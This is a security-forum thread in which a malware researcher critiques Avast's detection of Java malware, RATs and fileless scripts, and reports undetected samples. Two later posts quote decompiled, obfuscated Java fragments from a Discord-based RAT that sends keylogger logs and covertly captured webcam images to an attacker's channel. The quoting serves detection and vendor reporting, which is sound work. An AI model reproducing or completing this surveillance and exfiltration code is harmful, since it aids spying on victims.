Author Topic: Avast/AVG Protection Feedback  (Read 1641 times)

0 Members and 1 Guest are viewing this topic.

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Avast/AVG Protection Feedback
« on: December 01, 2020, 03:09:56 PM »
Hi,

I am a malware hunter and I've been experimenting with Avast recently.

It offers great malware protection, but I've noticed several glitches and areas of improvement:

Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn't block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.

C&C Servers:
Avast hasn't developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area of improvement.
I'm sure you have a database of known C&C servers and it won't be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.

Correction:
There is an option for blocking known C&C servers is settings, but it doesn’t look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.

Ransomware Protection:
It would've been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.

Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.

Scripts, fileless malware:
This is a bit of a hit and miss (tends to be effective with minor exceptions). I suggest you have a look at tools, such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, specially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.

Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in their entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.

Firewall:
Firewall doesn't seem to scan programs for viruses before allowing them to connect, as on my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a "hardened mode", where all untrusted executables are blocked from connecting.

As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and Python Stealer, which I discovered myself. At the time of sending, it had a very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take it more seriously, but there is no detection to date.
It could've made a great article.
GData analyst already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
« Last Edit: December 03, 2020, 02:53:54 PM by McMcBrad »

Offline schmidthouse

  • VIRUS FREE A Long Time
  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7077
  • When you think you know, Think Again
Re: Avast/AVG Protection Feedback
« Reply #1 on: December 02, 2020, 12:06:51 AM »
Well that's interesting enough.
***HP ENVY 15K LT W10 Pro 21H1 64Bit/750GB HD/16GB Ram/Avast Premium 21.9.2491b/Secureline VPN v.5.12.5699b/ADU v.21.3b/ASB v.94.0b/SANDBOXIE-plus/MailWasherPRO
**HP Compaq 8510p LT W10 Pro 20H2 64Bit/1TB HD/8GB Ram/WD/ADU v.21.3b/SANDBOXIE/MailWasherPRO/HotSpot Shield
     
RIP*Dell Inspiron XPsp4 PRO 32Bit/Avast(since 2002)18.8.2356/WP/Comodo FW 3.14/Secureline/Comodo IceDragon v.40
LAYERED SECURITY SOFTWARE

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #2 on: December 02, 2020, 01:05:27 AM »
Which statement you find interesting?

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #3 on: December 03, 2020, 12:29:25 PM »
Hi McMcBrad, welcome to the forum..!! :)

Just in case you need them, I'll add a few links...

• You can submit your feedback or a bug report in "About Avast". (Add a link to this thread)
• Submitting suggestions/ideas: https://forum.avast.com/index.php?topic=235975.0
• You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
• Avast Bug Bounty Program: https://www.avast.com/bug-bounty

PS: For the interested ones, see: https://malwaretips.com/threads/avast-premium-security-20-9.105149/
Win 8.1 [x64] - Avast PremSec 21.9.6660.IBC [UI.671] - EEK - Firefox ESR 78.15 [NS/uBO/PB] - TB 91.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #4 on: December 03, 2020, 08:36:30 PM »
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
Code: [Select]
FΑΚECRACKМЕΑААAAAΑАAА = new int[2];
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[0] = ((String)((Object)Dispatcher.bootstrap("get", 9L))).length();
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1] = "".length();


while (true) {
                DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)Dispatcher.bootstrap("get", 98784247905L) + Initializer.instance.UID + (String)Dispatcher.bootstrap("get", 29L)), (String)"", null, (MessageReceivedEvent)var2_2);
                try {
                    var3_4 = new FileWriter(KeyLoggerHelper.logs);
                    var3_4.write(KeyLoggerHelper.text);
                    var3_4.close();

  var2_2.getChannel().sendFile(KeyLoggerHelper.logs, new AttachmentOption[KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1]]).queue();
« Last Edit: December 04, 2020, 04:38:36 PM by McMcBrad »

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #5 on: December 04, 2020, 09:17:36 AM »
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code: [Select]
Example for code...

yada yada yada
Win 8.1 [x64] - Avast PremSec 21.9.6660.IBC [UI.671] - EEK - Firefox ESR 78.15 [NS/uBO/PB] - TB 91.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #6 on: December 04, 2020, 06:45:06 PM »
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code: [Select]
Example for code...

yada yada yada

Thank you and thanks for welcoming me to the forum.

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #7 on: December 05, 2020, 01:40:07 PM »
No problem, always good to see new smart/interested guys around. :)
Win 8.1 [x64] - Avast PremSec 21.9.6660.IBC [UI.671] - EEK - Firefox ESR 78.15 [NS/uBO/PB] - TB 91.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37106
Re: Avast/AVG Protection Feedback
« Reply #8 on: December 05, 2020, 07:33:12 PM »
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection



Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #9 on: December 05, 2020, 08:23:53 PM »
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection

There can be no detection on that code, as I have taken it out of context.
It comes from a program with no visible window that imports sarxos cam library and contains interesting modules you can see in the attachment.
This is the report of the program: https://www.virustotal.com/gui/file-analysis/MWM5N2UzOWU4OGJkZGZkY2UxZWIyNmE3OWYyYWEyNzM6MTYwNzE5NjIxMQ==/detection

The following code snippet saves camera image (obviously without your knowledge, as again, there is no visible window) and sends it to an attacker via discord:

Code: [Select]
  File file = new File(Initializer.instance.Dir, (String)((Object)Dispatcher.bootstrap("get", 201863462934L)));
        try {
            webcam = Webcam.getDefault();
            bl = webcam.isOpen();
        }
        catch (NullPointerException nullPointerException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462936L)), null, (MessageReceivedEvent)messageReceivedEvent);
            return;
        }
        if (!bl) {
            if (error == null) {
                throw error;
            }
            webcam.open();
        }
        BufferedImage bufferedImage = webcam.getImage();
        boolean bl2 = webcam.isOpen();
        if (bl2) {
            if (error == null) {
                throw error;
            }
            webcam.close();
        }
        try {
            ImageIO.write((RenderedImage)bufferedImage, (String)((Object)Dispatcher.bootstrap("get", 90194313235L)), file);
        }
        catch (IOException iOException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462937L)), null, (MessageReceivedEvent)messageReceivedEvent);
DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)"", null, (MessageReceivedEvent)messageReceivedEvent);
        messageReceivedEvent.getChannel().sendFile(file, new AttachmentOption[FАKЕСRАCКМΕAAΑAAААΑΑΑ[1]]).queue();
        try {
           
« Last Edit: December 05, 2020, 08:38:19 PM by McMcBrad »